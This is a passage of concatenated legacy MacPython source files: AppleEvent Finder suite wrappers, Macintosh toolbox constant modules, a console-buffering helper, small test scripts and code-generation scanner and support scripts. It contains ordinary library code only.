if _arguments.has_key('----'):
return _arguments['----']
_argmap__print = {
'items' : 'fsel',
}
def _print(self, _object, _attributes={}, **_arguments):
"""print: Print items from a given folder
Required argument: Alias for folder containing the items
Keyword argument items: List of aliases for items in folder
Keyword argument _attributes: AppleEvent attribute dictionary
"""
_code = 'FNDR'
_subcode = 'spri'
aetools.keysubst(_arguments, self._argmap__print)
_arguments['----'] = _object
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.has_key('errn'):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
_argmap_put_away = {
'items' : 'fsel',
}
def put_away(self, _object, _attributes={}, **_arguments):
"""put away: Put away items from a given folder
Required argument: Alias for folder containing the items
Keyword argument items: List of aliases to items in folder
Keyword argument _attributes: AppleEvent attribute dictionary
Returns: undocumented, typecode 'alis'
"""
_code = 'FNDR'
_subcode = 'sput'
aetools.keysubst(_arguments, self._argmap_put_away)
_arguments['----'] = _object
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.has_key('errn'):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
def restart(self, _no_object=None, _attributes={}, **_arguments):
"""restart: Restart the Macintosh
Keyword argument _attributes: AppleEvent attribute dictionary
"""
_code = 'FNDR'
_subcode = 'rest'
if _arguments: raise TypeError, 'No optional args expected'
if _no_object != None: raise TypeError, 'No direct arg expected'
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.has_key('errn'):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
_argmap_select = {
'items' : 'fsel',
}
def select(self, _object, _attributes={}, **_arguments):
"""select: Select items in a folder
Required argument: Alias for folder containing the items
Keyword argument items: List of aliases for items in folder
Keyword argument _attributes: AppleEvent attribute dictionary
"""
_code = 'FNDR'
_subcode = 'srev'
aetools.keysubst(_arguments, self._argmap_select)
_arguments['----'] = _object
_reply, _arguments, _attributes = self.send(_code, _subcode,
_arguments, _attributes)
if _arguments.has_key('errn'):
raise aetools.Error, aetools.decodeerror(_arguments)
# XXXX Optionally decode result
if _arguments.has_key('----'):
return _arguments['----']
#
# Indices of types declared in this module
#
_classdeclarations = {
}
_propdeclarations = {
}
_compdeclarations = {
}
_enumdeclarations = {
}
```
#### File: Lib/lib-toolbox/Lists.py
```python
def FOUR_CHAR_CODE(x): return x
listNotifyNothing = FOUR_CHAR_CODE('nada')
listNotifyClick = FOUR_CHAR_CODE('clik')
listNotifyDoubleClick = FOUR_CHAR_CODE('dblc')
listNotifyPreClick = FOUR_CHAR_CODE('pclk')
lDoVAutoscrollBit = 1
lDoHAutoscrollBit = 0
lDoVAutoscroll = 2
lDoHAutoscroll = 1
lOnlyOneBit = 7
lExtendDragBit = 6
lNoDisjointBit = 5
lNoExtendBit = 4
lNoRectBit = 3
lUseSenseBit = 2
lNoNilHiliteBit = 1
lOnlyOne = -128
lExtendDrag = 64
lNoDisjoint = 32
lNoExtend = 16
lNoRect = 8
lUseSense = 4
lNoNilHilite = 2
lInitMsg = 0
lDrawMsg = 1
lHiliteMsg = 2
lCloseMsg = 3
```
#### File: Lib/lib-toolbox/Menus.py
```python
def FOUR_CHAR_CODE(x): return x
kMenuStdMenuProc = 63
kMenuStdMenuBarProc = 63
kMenuNoModifiers = 0
kMenuNoIcon = 0
kMenuIconType = 1
kMenuShrinkIconType = 2
kMenuSmallIconType = 3
kMenuColorIconType = 4
kMenuIconSuiteType = 5
kMenuIconRefType = 6
noMark = 0
kMenuDrawMsg = 0
kMenuChooseMsg = 1
kMenuSizeMsg = 2
kMenuDrawItemMsg = 4
kMenuCalcItemMsg = 5
kMenuThemeSavvyMsg = 7
mDrawMsg = 0
mChooseMsg = 1
mSizeMsg = 2
mDrawItemMsg = 4
mCalcItemMsg = 5
kThemeSavvyMenuResponse = 0x7473
textMenuProc = 0
hMenuCmd = 27
hierMenu = -1
mPopUpMsg = 3
mctAllItems = -98
mctLastIDIndic = -99
gestaltContextualMenuAttr = FOUR_CHAR_CODE('cmnu')
gestaltContextualMenuUnusedBit = 0
gestaltContextualMenuTrapAvailable = 1
kCMHelpItemNoHelp = 0
kCMHelpItemAppleGuide = 1
kCMHelpItemOtherHelp = 2
kCMNothingSelected = 0
kCMMenuItemSelected = 1
kCMShowHelpSelected = 3
```
#### File: Lib/lib-toolbox/QDOffscreen.py
```python
def FOUR_CHAR_CODE(x): return x
pixPurgeBit = 0
noNewDeviceBit = 1
useTempMemBit = 2
keepLocalBit = 3
pixelsPurgeableBit = 6
pixelsLockedBit = 7
mapPixBit = 16
newDepthBit = 17
alignPixBit = 18
newRowBytesBit = 19
reallocPixBit = 20
clipPixBit = 28
stretchPixBit = 29
ditherPixBit = 30
gwFlagErrBit = 31
pixPurge = 1L << pixPurgeBit
noNewDevice = 1L << noNewDeviceBit
useTempMem = 1L << useTempMemBit
keepLocal = 1L << keepLocalBit
pixelsPurgeable = 1L << pixelsPurgeableBit
pixelsLocked = 1L << pixelsLockedBit
kAllocDirectDrawSurface = 1L << 14
mapPix = 1L << mapPixBit
newDepth = 1L << newDepthBit
alignPix = 1L << alignPixBit
newRowBytes = 1L << newRowBytesBit
reallocPix = 1L << reallocPixBit
clipPix = 1L << clipPixBit
stretchPix = 1L << stretchPixBit
ditherPix = 1L << ditherPixBit
gwFlagErr = 1L << gwFlagErrBit
```
#### File: Lib/lib-toolbox/Sound.py
```python
def FOUR_CHAR_CODE(x): return x
soundListRsrc = FOUR_CHAR_CODE('snd ')
kSimpleBeepID = 1
rate22050hz = 0x56220000
rate22khz = 0x56EE8BA3
rate11khz = 0x2B7745D1
rate11025hz = 0x2B110000
squareWaveSynth = 1
waveTableSynth = 3
sampledSynth = 5
MACE3snthID = 11
MACE6snthID = 13
kMiddleC = 60
kNoVolume = 0
kFullVolume = 0x0100
stdQLength = 128
dataOffsetFlag = 0x8000
kUseOptionalOutputDevice = -1
notCompressed = 0
fixedCompression = -1
variableCompression = -2
twoToOne = 1
eightToThree = 2
threeToOne = 3
sixToOne = 4
sixToOnePacketSize = 8
threeToOnePacketSize = 16
stateBlockSize = 64
leftOverBlockSize = 32
firstSoundFormat = 0x0001
secondSoundFormat = 0x0002
dbBufferReady = 0x00000001
dbLastBuffer = 0x00000004
sysBeepDisable = 0x0000
unitTypeNoSelection = 0xFFFF
unitTypeSeconds = 0x0000
stdSH = 0x00
extSH = 0xFF
cmpSH = 0xFE
nullCmd = 0
initCmd = 1
freeCmd = 2
quietCmd = 3
flushCmd = 4
reInitCmd = 5
waitCmd = 10
pauseCmd = 11
resumeCmd = 12
callBackCmd = 13
syncCmd = 14
availableCmd = 24
versionCmd = 25
totalLoadCmd = 26
loadCmd = 27
freqDurationCmd = 40
restCmd = 41
freqCmd = 42
ampCmd = 43
timbreCmd = 44
getAmpCmd = 45
volumeCmd = 46
getVolumeCmd = 47
clockComponentCmd = 50
getClockComponentCmd = 51
scheduledSoundCmd = 52
linkSoundComponentsCmd = 53
waveTableCmd = 60
phaseCmd = 61
soundCmd = 80
bufferCmd = 81
rateCmd = 82
continueCmd = 83
doubleBufferCmd = 84
getRateCmd = 85
rateMultiplierCmd = 86
getRateMultiplierCmd = 87
sizeCmd = 90
convertCmd = 91
waveInitChannelMask = 0x07
waveInitChannel0 = 0x04
waveInitChannel1 = 0x05
waveInitChannel2 = 0x06
waveInitChannel3 = 0x07
initChan0 = waveInitChannel0
initChan1 = waveInitChannel1
initChan2 = waveInitChannel2
initChan3 = waveInitChannel3
outsideCmpSH = 0
insideCmpSH = 1
aceSuccess = 0
aceMemFull = 1
aceNilBlock = 2
aceBadComp = 3
aceBadEncode = 4
aceBadDest = 5
aceBadCmd = 6
initChanLeft = 0x0002
initChanRight = 0x0003
initNoInterp = 0x0004
initNoDrop = 0x0008
initMono = 0x0080
initStereo = 0x00C0
initMACE3 = 0x0300
initMACE6 = 0x0400
initPanMask = 0x0003
initSRateMask = 0x0030
initStereoMask = 0x00C0
initCompMask = 0xFF00
siActiveChannels = FOUR_CHAR_CODE('chac')
siActiveLevels = FOUR_CHAR_CODE('lmac')
siAGCOnOff = FOUR_CHAR_CODE('agc ')
siAsync = FOUR_CHAR_CODE('asyn')
siAVDisplayBehavior = FOUR_CHAR_CODE('avdb')
siChannelAvailable = FOUR_CHAR_CODE('chav')
siCompressionAvailable = FOUR_CHAR_CODE('cmav')
siCompressionFactor = FOUR_CHAR_CODE('cmfa')
siCompressionHeader = FOUR_CHAR_CODE('cmhd')
siCompressionNames = FOUR_CHAR_CODE('cnam')
siCompressionParams = FOUR_CHAR_CODE('evaw')
siCompressionType = FOUR_CHAR_CODE('comp')
siContinuous = FOUR_CHAR_CODE('cont')
siDecompressionParams = FOUR_CHAR_CODE('wave')
siDeviceBufferInfo = FOUR_CHAR_CODE('dbin')
siDeviceConnected = FOUR_CHAR_CODE('dcon')
siDeviceIcon = FOUR_CHAR_CODE('icon')
siDeviceName = FOUR_CHAR_CODE('name')
siHardwareBalance = FOUR_CHAR_CODE('hbal')
siHardwareBalanceSteps = FOUR_CHAR_CODE('hbls')
siHardwareBass = FOUR_CHAR_CODE('hbas')
siHardwareBassSteps = FOUR_CHAR_CODE('hbst')
siHardwareBusy = FOUR_CHAR_CODE('hwbs')
siHardwareFormat = FOUR_CHAR_CODE('hwfm')
siHardwareMute = FOUR_CHAR_CODE('hmut')
siHardwareTreble = FOUR_CHAR_CODE('htrb')
siHardwareTrebleSteps = FOUR_CHAR_CODE('hwts')
siHardwareVolume = FOUR_CHAR_CODE('hvol')
siHardwareVolumeSteps = FOUR_CHAR_CODE('hstp')
siHeadphoneMute = FOUR_CHAR_CODE('pmut')
siHeadphoneVolume = FOUR_CHAR_CODE('pvol')
siHeadphoneVolumeSteps = FOUR_CHAR_CODE('hdst')
siInputAvailable = FOUR_CHAR_CODE('inav')
siInputGain = FOUR_CHAR_CODE('gain')
siInputSource = FOUR_CHAR_CODE('sour')
siInputSourceNames = FOUR_CHAR_CODE('snam')
siLevelMeterOnOff = FOUR_CHAR_CODE('lmet')
siModemGain = FOUR_CHAR_CODE('mgai')
siMonitorAvailable = FOUR_CHAR_CODE('mnav')
siMonitorSource = FOUR_CHAR_CODE('mons')
siNumberChannels = FOUR_CHAR_CODE('chan')
siOptionsDialog = FOUR_CHAR_CODE('optd')
siOSTypeInputSource = FOUR_CHAR_CODE('inpt')
siOSTypeInputAvailable = FOUR_CHAR_CODE('inav')
siPlayThruOnOff = FOUR_CHAR_CODE('plth')
siPostMixerSoundComponent = FOUR_CHAR_CODE('psmx')
siPreMixerSoundComponent = FOUR_CHAR_CODE('prmx')
siQuality = FOUR_CHAR_CODE('qual')
siRateMultiplier = FOUR_CHAR_CODE('rmul')
siRecordingQuality = FOUR_CHAR_CODE('qual')
siSampleRate = FOUR_CHAR_CODE('srat')
siSampleRateAvailable = FOUR_CHAR_CODE('srav')
siSampleSize = FOUR_CHAR_CODE('ssiz')
siSampleSizeAvailable = FOUR_CHAR_CODE('ssav')
siSetupCDAudio = FOUR_CHAR_CODE('sucd')
siSetupModemAudio = FOUR_CHAR_CODE('sumd')
siSlopeAndIntercept = FOUR_CHAR_CODE('flap')
siSoundClock = FOUR_CHAR_CODE('sclk')
siUseThisSoundClock = FOUR_CHAR_CODE('sclc')
siSpeakerMute = FOUR_CHAR_CODE('smut')
siSpeakerVolume = FOUR_CHAR_CODE('svol')
siSSpCPULoadLimit = FOUR_CHAR_CODE('3dll')
siSSpLocalization = FOUR_CHAR_CODE('3dif')
siSSpSpeakerSetup = FOUR_CHAR_CODE('3dst')
siStereoInputGain = FOUR_CHAR_CODE('sgai')
siSubwooferMute = FOUR_CHAR_CODE('bmut')
siTwosComplementOnOff = FOUR_CHAR_CODE('twos')
siVolume = FOUR_CHAR_CODE('volu')
siVoxRecordInfo = FOUR_CHAR_CODE('voxr')
siVoxStopInfo = FOUR_CHAR_CODE('voxs')
siWideStereo = FOUR_CHAR_CODE('wide')
siCloseDriver = FOUR_CHAR_CODE('clos')
siInitializeDriver = FOUR_CHAR_CODE('init')
siPauseRecording = FOUR_CHAR_CODE('paus')
siUserInterruptProc = FOUR_CHAR_CODE('user')
kNoSource = FOUR_CHAR_CODE('none')
kCDSource = FOUR_CHAR_CODE('cd ')
kExtMicSource = FOUR_CHAR_CODE('emic')
kRCAInSource = FOUR_CHAR_CODE('irca')
kTVFMTunerSource = FOUR_CHAR_CODE('tvfm')
kDAVInSource = FOUR_CHAR_CODE('idav')
kIntMicSource = FOUR_CHAR_CODE('imic')
kMediaBaySource = FOUR_CHAR_CODE('mbay')
kModemSource = FOUR_CHAR_CODE('modm')
kPCCardSource = FOUR_CHAR_CODE('pcm ')
kZoomVideoSource = FOUR_CHAR_CODE('zvpc')
kDVDSource = FOUR_CHAR_CODE('dvda')
kNoSoundComponentType = FOUR_CHAR_CODE('****')
kSoundComponentType = FOUR_CHAR_CODE('sift')
kSoundComponentPPCType = FOUR_CHAR_CODE('nift')
kRate8SubType = FOUR_CHAR_CODE('ratb')
kRate16SubType = FOUR_CHAR_CODE('ratw')
kConverterSubType = FOUR_CHAR_CODE('conv')
kSndSourceSubType = FOUR_CHAR_CODE('sour')
kMixerType = FOUR_CHAR_CODE('mixr')
kMixer8SubType = FOUR_CHAR_CODE('mixb')
kMixer16SubType = FOUR_CHAR_CODE('mixw')
kSoundInputDeviceType = FOUR_CHAR_CODE('sinp')
kWaveInSubType = FOUR_CHAR_CODE('wavi')
kSoundOutputDeviceType = FOUR_CHAR_CODE('sdev')
kClassicSubType = FOUR_CHAR_CODE('clas')
kASCSubType = FOUR_CHAR_CODE('asc ')
kDSPSubType = FOUR_CHAR_CODE('dsp ')
kAwacsSubType = FOUR_CHAR_CODE('awac')
kGCAwacsSubType = FOUR_CHAR_CODE('awgc')
kSingerSubType = FOUR_CHAR_CODE('sing')
kSinger2SubType = FOUR_CHAR_CODE('sng2')
kWhitSubType = FOUR_CHAR_CODE('whit')
kSoundBlasterSubType = FOUR_CHAR_CODE('sbls')
kWaveOutSubType = FOUR_CHAR_CODE('wavo')
kDirectSoundSubType = FOUR_CHAR_CODE('dsnd')
kUNIXsdevSubType = FOUR_CHAR_CODE('un1x')
kSoundCompressor = FOUR_CHAR_CODE('scom')
kSoundDecompressor = FOUR_CHAR_CODE('sdec')
kAudioComponentType = FOUR_CHAR_CODE('adio')
kAwacsPhoneSubType = FOUR_CHAR_CODE('hphn')
kAudioVisionSpeakerSubType = FOUR_CHAR_CODE('telc')
kAudioVisionHeadphoneSubType = FOUR_CHAR_CODE('telh')
kPhilipsFaderSubType = FOUR_CHAR_CODE('tvav')
kSGSToneSubType = FOUR_CHAR_CODE('sgs0')
kSoundEffectsType = FOUR_CHAR_CODE('snfx')
kSSpLocalizationSubType = FOUR_CHAR_CODE('snd3')
kSoundNotCompressed = FOUR_CHAR_CODE('NONE')
k8BitOffsetBinaryFormat = FOUR_CHAR_CODE('raw ')
k16BitBigEndianFormat = FOUR_CHAR_CODE('twos')
k16BitLittleEndianFormat = FOUR_CHAR_CODE('sowt')
kFloat32Format = FOUR_CHAR_CODE('fl32')
kFloat64Format = FOUR_CHAR_CODE('fl64')
k24BitFormat = FOUR_CHAR_CODE('in24')
k32BitFormat = FOUR_CHAR_CODE('in32')
kMACE3Compression = FOUR_CHAR_CODE('MAC3')
kMACE6Compression = FOUR_CHAR_CODE('MAC6')
kCDXA4Compression = FOUR_CHAR_CODE('cdx4')
kCDXA2Compression = FOUR_CHAR_CODE('cdx2')
kIMACompression = FOUR_CHAR_CODE('ima4')
kULawCompression = FOUR_CHAR_CODE('ulaw')
kALawCompression = FOUR_CHAR_CODE('alaw')
kMicrosoftADPCMFormat = 0x6D730002
kDVIIntelIMAFormat = 0x6D730011
kDVAudioFormat = FOUR_CHAR_CODE('dvca')
kOffsetBinary = k8BitOffsetBinaryFormat
kTwosComplement = k16BitBigEndianFormat
kLittleEndianFormat = k16BitLittleEndianFormat
k16BitNativeEndianFormat = k16BitLittleEndianFormat
k16BitNonNativeEndianFormat = k16BitBigEndianFormat
k16BitNativeEndianFormat = k16BitBigEndianFormat
k16BitNonNativeEndianFormat = k16BitLittleEndianFormat
kInputMask = 0x000000FF
kOutputMask = 0x0000FF00
kOutputShift = 8
kActionMask = 0x00FF0000
kSoundComponentBits = 0x00FFFFFF
kAudioFormatAtomType = FOUR_CHAR_CODE('frma')
kAudioEndianAtomType = FOUR_CHAR_CODE('enda')
kAudioTerminatorAtomType = 0
kAVDisplayHeadphoneRemove = 0
kAVDisplayHeadphoneInsert = 1
kAVDisplayPlainTalkRemove = 2
kAVDisplayPlainTalkInsert = 3
audioAllChannels = 0
audioLeftChannel = 1
audioRightChannel = 2
audioUnmuted = 0
audioMuted = 1
siCDQuality = FOUR_CHAR_CODE('cd ')
siBestQuality = FOUR_CHAR_CODE('best')
siBetterQuality = FOUR_CHAR_CODE('betr')
siGoodQuality = FOUR_CHAR_CODE('good')
siDeviceIsConnected = 1
siDeviceNotConnected = 0
siDontKnowIfConnected = -1
siReadPermission = 0
siWritePermission = 1
kScheduledSoundDoScheduled = 1 << 0
kScheduledSoundDoCallBack = 1 << 1
kSoundComponentInitOutputDeviceSelect = 0x0001
kSoundComponentSetSourceSelect = 0x0002
kSoundComponentGetSourceSelect = 0x0003
kSoundComponentGetSourceDataSelect = 0x0004
kSoundComponentSetOutputSelect = 0x0005
kSoundComponentAddSourceSelect = 0x0101
kSoundComponentRemoveSourceSelect = 0x0102
kSoundComponentGetInfoSelect = 0x0103
kSoundComponentSetInfoSelect = 0x0104
kSoundComponentStartSourceSelect = 0x0105
kSoundComponentStopSourceSelect = 0x0106
kSoundComponentPauseSourceSelect = 0x0107
kSoundComponentPlaySourceBufferSelect = 0x0108
kAudioGetVolumeSelect = 0x0000
kAudioSetVolumeSelect = 0x0001
kAudioGetMuteSelect = 0x0002
kAudioSetMuteSelect = 0x0003
kAudioSetToDefaultsSelect = 0x0004
kAudioGetInfoSelect = 0x0005
kAudioGetBassSelect = 0x0006
kAudioSetBassSelect = 0x0007
kAudioGetTrebleSelect = 0x0008
kAudioSetTrebleSelect = 0x0009
kAudioGetOutputDeviceSelect = 0x000A
kAudioMuteOnEventSelect = 0x0081
kDelegatedSoundComponentSelectors = 0x0100
kSndInputReadAsyncSelect = 0x0001
kSndInputReadSyncSelect = 0x0002
kSndInputPauseRecordingSelect = 0x0003
kSndInputResumeRecordingSelect = 0x0004
kSndInputStopRecordingSelect = 0x0005
kSndInputGetStatusSelect = 0x0006
kSndInputGetDeviceInfoSelect = 0x0007
kSndInputSetDeviceInfoSelect = 0x0008
kSndInputInitHardwareSelect = 0x0009
```
#### File: Mac/Lib/quietconsole.py
```python
import types
import sys
class _PseudoStdin:
def __init__(self, stdouterr):
self.keep_stdin = sys.stdin
sys.stdin = self
self.keep_stdouterr = stdouterr
def __del__(self):
self.keep_stdin = self.keep_stdouterr = None
def _revert(self):
"""Return to old state, with true stdio"""
if self.keep_stdin == None:
return
sys.stdin = self.keep_stdin
self.keep_stdin = None
self.keep_stdouterr._revert(1)
self.keep_stdouterr = None
def read(self, *args):
self._revert()
return apply(sys.stdin.read, args)
def readlines(self, *args):
self._revert()
return apply(sys.stdin.readlines, args)
def readline(self, *args):
self._revert()
return apply(sys.stdin.readline, args)
def close(self):
self._revert()
sys.stdin.close()
class _PseudoStdouterr:
def __init__(self):
self.keep_stdout = sys.stdout
self.keep_stderr = sys.stderr
sys.stdout = sys.stderr = self
self.data = []
def __del__(self):
self.keep_stdout = self.keep_stderr = None
def _revert(self, dumpdata=0):
if self.keep_stdout == None:
return
sys.stdout = self.keep_stdout
sys.stderr = self.keep_stderr
sys.keep_stdout = self.keep_stderr = None
if dumpdata and self.data:
for d in self.data:
sys.stdout.write(d)
self.data = None
def write(self, arg):
self.data.append(arg)
def writelines(self, arg):
for d in arg:
self.data.append(arg)
def close(self):
self.keep_stdout = self.keep_stderr = self.data = None
beenhere = 0
def install():
global beenhere
if beenhere:
return
beenhere = 1
# There's no point in re-installing if the console has been active
obj = _PseudoStdouterr()
_PseudoStdin(obj)
# No need to keep the objects, they're saved in sys.std{in,out,err}
def revert():
if type(sys.stdin) == types.FileType:
return # Not installed
sys.stdin._revert()
def _test():
import time
install()
print "You will not see this yet"
time.sleep(1)
print "You will not see this yet"
time.sleep(1)
print "You will not see this yet"
time.sleep(1)
print "You will not see this yet"
time.sleep(1)
print "You will not see this yet"
time.sleep(1)
print "5 seconds have passed, now you may type something"
rv = sys.stdin.readline()
print "You typed", rv
if __name__ == '__main__':
_test()
```
#### File: Lib/test/cmtest.py
```python
import Cm
import Res
import sys
def getstr255(r):
"""Get string from str255 resource"""
if not r.data: return ''
len = ord(r.data[0])
return r.data[1:1+len]
def getinfo(c):
"""Return (type, subtype, creator, fl1, fl2, name, description) for component"""
h1 = Res.Resource('')
h2 = Res.Resource('')
h3 = Res.Resource('')
type, subtype, creator, fl1, fl2 = c.GetComponentInfo(h1, h2, h3)
name = getstr255(h1)
description = getstr255(h2)
return type, subtype, creator, fl1, fl2, name, description
def getallcomponents():
"""Return list with info for all components, sorted"""
any = ('\0\0\0\0', '\0\0\0\0', '\0\0\0\0', 0, 0)
c = None
rv = []
while 1:
try:
c = Cm.FindNextComponent(c, any)
except Cm.Error:
break
rv.append(getinfo(c))
rv.sort()
return rv
def main():
"""Print info for all components"""
info = getallcomponents()
for type, subtype, creator, f1, f2, name, description in info:
print '%4.4s %4.4s %4.4s %s 0x%x 0x%x'%(type, subtype, creator, name, f1, f2)
print ' ', description
sys.exit(1)
main()
```
#### File: Lib/test/testfinderopen.py
```python
import Finder_7_0_Suite
import aetools
import MacOS
import sys
import macfs
SIGNATURE='MACS'
class Finder(aetools.TalkTo, Finder_7_0_Suite.Finder_7_0_Suite):
pass
def open_in_finder(file):
"""Open a file thru the finder. Specify file by name or fsspec"""
finder = Finder(SIGNATURE)
fss = macfs.FSSpec(file)
vRefNum, parID, name = fss.as_tuple()
dir_fss = macfs.FSSpec((vRefNum, parID, ''))
file_alias = fss.NewAlias()
dir_alias = dir_fss.NewAlias()
return finder.open(file_alias, items=[file_alias])
def main():
fss, ok = macfs.PromptGetFile('File to launch:')
if not ok: sys.exit(0)
result = open_in_finder(fss)
if result:
print 'Result: ', result
if __name__ == '__main__':
main()
```
#### File: Lib/test/twedit.py
```python
from FrameWork import *
import Win
import Qd
import waste
import WASTEconst
import os
class WasteWindow(Window):
def open(self, name):
r = (40, 40, 400, 300)
w = Win.NewWindow(r, name, 1, 0, -1, 1, 0x55555555)
r2 = (0, 0, 400-40-16, 300-40-16)
Qd.SetPort(w)
flags = WASTEconst.weDoAutoScroll | WASTEconst.weDoOutlineHilite | \
WASTEconst.weDoMonoStyled
self.ted = waste.WENew(r2, r2, flags)
w.DrawGrowIcon()
self.wid = w
self.do_postopen()
def do_idle(self):
self.ted.WEIdle()
def do_activate(self, onoff, evt):
if onoff:
self.ted.WEActivate()
else:
self.ted.WEDeactivate()
def do_update(self, wid, event):
Qd.EraseRect(wid.GetWindowPort().portRect)
self.ted.WEUpdate(wid.GetWindowPort().visRgn)
def do_contentclick(self, local, modifiers, evt):
(what, message, when, where, modifiers) = evt
self.ted.WEClick(local, modifiers, when)
def do_char(self, ch, event):
(what, message, when, where, modifiers) = event
self.ted.WEKey(ord(ch), modifiers)
class TestWaste(Application):
def __init__(self):
Application.__init__(self)
self.num = 0
self.listoflists = []
def makeusermenus(self):
self.filemenu = m = Menu(self.menubar, "File")
self.newitem = MenuItem(m, "New window...", "O", self.open)
self.quititem = MenuItem(m, "Quit", "Q", self.quit)
def open(self, *args):
w = WasteWindow(self)
w.open('Window %d'%self.num)
self.num = self.num + 1
self.listoflists.append(w)
def quit(self, *args):
raise self
def do_about(self, id, item, window, event):
EasyDialogs.Message("""Test the WASTE interface.
Simple window in which you can type""")
def do_idle(self, *args):
for l in self.listoflists:
l.do_idle()
def main():
print 'Open app'
App = TestWaste()
print 'run'
App.mainloop()
if __name__ == '__main__':
main()
```
#### File: Modules/ae/aescan.py
```python
import sys
import os
import string
import regex
import regsub
import MacOS
BGENDIR=os.path.join(sys.prefix, ':Tools:bgen:bgen')
sys.path.append(BGENDIR)
from bgenlocations import TOOLBOXDIR
from scantools import Scanner
def main():
print "=== Scanning AERegistry.h for defines ==="
input = "AERegistry.h"
output = "@dummy-registry.py"
defsoutput = TOOLBOXDIR + "AERegistry.py"
scanner = AppleEventsRegScanner(input, output, defsoutput)
scanner.scan()
scanner.close()
print "=== Scanning AEObjects.h for defines ==="
# XXXX This isn't correct. We only scan AEObjects.h for defines, but there
# are some functions in there that are probably useful (the accessor stuff)
# once we start writing servers in python.
input = "AEObjects.h"
output = "@dummy-objects.py"
defsoutput = TOOLBOXDIR + "AEObjects.py"
scanner = AppleEventsScanner(input, output, defsoutput)
scanner.scan()
scanner.close()
print "=== Scanning AEDataModel.h ==="
input = "AEDataModel.h"
output = "aedatamodelgen.py"
defsoutput = TOOLBOXDIR + "AEDataModel.py"
scanner = AppleEventsScanner(input, output, defsoutput)
scanner.scan()
scanner.close()
print "=== Scanning AppleEvents.h ==="
input = "AppleEvents.h"
output = "aegen.py"
defsoutput = TOOLBOXDIR + "AppleEvents.py"
scanner = AppleEventsRegScanner(input, output, defsoutput)
scanner.scan()
scanner.close()
print "=== Done Scanning and Generating, now doing 'import aesupport' ==="
import aesupport
print "=== Done 'import aesupport'. It's up to you to compile AEmodule.c ==="
class AppleEventsScanner(Scanner):
def destination(self, type, name, arglist):
classname = "AEFunction"
listname = "functions"
if arglist:
t, n, m = arglist[0]
if t[-4:] == "_ptr" and m == "InMode" and \
t[:-4] in ("AEDesc", "AEAddressDesc", "AEDescList",
"AERecord", "AppleEvent"):
classname = "AEMethod"
listname = "aedescmethods"
return classname, listname
def makeblacklistnames(self):
return [
"AEDisposeDesc",
# "AEGetEventHandler",
]
def makeblacklisttypes(self):
return [
"ProcPtr",
"AEArrayType",
"AECoercionHandlerUPP",
"UniversalProcPtr",
]
def makerepairinstructions(self):
return [
([("Boolean", "isSysHandler", "InMode")],
[("AlwaysFalse", "*", "*")]),
([("void_ptr", "*", "InMode"), ("Size", "*", "InMode")],
[("InBuffer", "*", "*")]),
([("EventHandlerProcPtr", "*", "InMode"), ("long", "*", "InMode")],
[("EventHandler", "*", "*")]),
([("EventHandlerProcPtr", "*", "OutMode"), ("long", "*", "OutMode")],
[("EventHandler", "*", "*")]),
([("AEEventHandlerUPP", "*", "InMode"), ("long", "*", "InMode")],
[("EventHandler", "*", "*")]),
([("AEEventHandlerUPP", "*", "OutMode"), ("long", "*", "OutMode")],
[("EventHandler", "*", "*")]),
([("void", "*", "OutMode"), ("Size", "*", "InMode"),
("Size", "*", "OutMode")],
[("VarVarOutBuffer", "*", "InOutMode")]),
([("AppleEvent", "theAppleEvent", "OutMode")],
[("AppleEvent_ptr", "*", "InMode")]),
([("AEDescList", "theAEDescList", "OutMode")],
[("AEDescList_ptr", "*", "InMode")]),
]
def writeinitialdefs(self):
self.defsfile.write("def FOUR_CHAR_CODE(x): return x\n")
class AppleEventsRegScanner(AppleEventsScanner):
def writeinitialdefs(self):
self.defsfile.write("def FOUR_CHAR_CODE(x): return x\n")
self.defsfile.write("from AEDataModel import *\n")
if __name__ == "__main__":
main()
```
#### File: Modules/ctl/ctlsupport.py
```python
import string
# Declarations that change for each manager
MACHEADERFILE = 'Controls.h' # The Apple header file
MODNAME = 'Ctl' # The name of the module
OBJECTNAME = 'Control' # The basic name of the objects used here
# The following is *usually* unchanged but may still require tuning
MODPREFIX = MODNAME # The prefix for module-wide routines
OBJECTTYPE = OBJECTNAME + 'Handle' # The C type used to represent them
OBJECTPREFIX = MODPREFIX + 'Obj' # The prefix for object methods
INPUTFILE = string.lower(MODPREFIX) + 'gen.py' # The file generated by the scanner
OUTPUTFILE = MODNAME + "module.c" # The file generated by this program
from macsupport import *
# Create the type objects
ControlHandle = OpaqueByValueType(OBJECTTYPE, OBJECTPREFIX)
ControlRef = ControlHandle
ExistingControlHandle = OpaqueByValueType(OBJECTTYPE, "CtlObj_WhichControl", "BUG")
RgnHandle = OpaqueByValueType("RgnHandle", "ResObj")
CCTabHandle = OpaqueByValueType("CCTabHandle", "ResObj")
AuxCtlHandle = OpaqueByValueType("AuxCtlHandle", "ResObj")
ControlPartCode = Type("ControlPartCode", "h")
DragConstraint = Type("DragConstraint", "h")
ControlVariant = Type("ControlVariant", "h")
IconTransformType = Type("IconTransformType", "h")
ControlButtonGraphicAlignment = Type("ControlButtonGraphicAlignment", "h")
ControlButtonTextAlignment = Type("ControlButtonTextAlignment", "h")
ControlButtonTextPlacement = Type("ControlButtonTextPlacement", "h")
ControlContentType = Type("ControlContentType", "h")
ControlFocusPart = Type("ControlFocusPart", "h")
ControlFontStyleRec = OpaqueType('ControlFontStyleRec', 'ControlFontStyle')
ControlFontStyleRec_ptr = ControlFontStyleRec
includestuff = includestuff + """
#include <%s>""" % MACHEADERFILE + """
#define as_Control(h) ((ControlHandle)h)
#define resNotFound -192 /* Can't include <Errors.h> because of Python's "errors.h" */
extern PyObject *CtlObj_WhichControl(ControlHandle); /* Forward */
extern PyObject *QdRGB_New(RGBColorPtr);
extern QdRGB_Convert(PyObject *, RGBColorPtr);
#ifdef THINK_C
#define ControlActionUPP ProcPtr
#endif
/*
** Parse/generate ControlFontStyleRec records
*/
#if 0 /* Not needed */
PyObject *ControlFontStyle_New(itself)
ControlFontStyleRec *itself;
{
return Py_BuildValue("hhhhhhO&O&", itself->flags, itself->font,
